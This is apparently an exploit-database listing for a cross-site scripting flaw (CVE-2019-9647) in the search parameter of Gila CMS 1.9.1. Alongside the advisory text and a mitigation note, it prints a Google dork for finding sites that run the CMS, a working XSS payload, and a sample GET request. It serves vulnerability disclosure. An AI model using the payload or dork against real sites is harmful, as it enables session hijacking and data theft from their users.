header-logo
Suggest Exploit
vendor:
Gila CMS
by:
Ahmet Ümit BAYRAM
6.1
CVSS
MEDIUM
Cross Site Scripting
79
CWE
Product Name: Gila CMS
Affected Version From: 1.9.1
Affected Version To: 1.9.1
Patch Exists: NO
Related CWE: CVE-2019-9647
CPE: a:gilacms:gila_cms
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2019

Gila CMS (search) Cross Site Scripting

Gila CMS is vulnerable to Cross Site Scripting (XSS) attacks. An attacker can inject malicious JavaScript code into the search parameter of the application. When a user visits the vulnerable page, the malicious code will be executed in the user's browser. This can be used to steal user data, hijack user sessions, redirect users to malicious websites, etc.

Mitigation:

Input validation should be used to prevent XSS attacks. All user-supplied input should be validated and filtered before being used in the application.
Source

Exploit-DB raw data:

# Exploit Title: Gila CMS (search) Cross Site Scripting
# Google Dork: intext:"Powered By Gila CMS"
# Date: 11.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://gilacms.com
# Software Link: https://gilacms.com/packages/downloadRelease/1.9.1.zip
# Demo Site: https://gilacms.com/demo/
# Version: 1.9.1
# Tested on: Kali Linux
# CVE: CVE-2019-9647

# Vulnerable Parameter: search

# Payload: <--`<img/src=` onerror=confirm``> --!>

# GET Request: http://localhost/?search=<--`<img/src=` onerror=confirm``> --!>

Navigation

Suggest Exploit

Services By CQR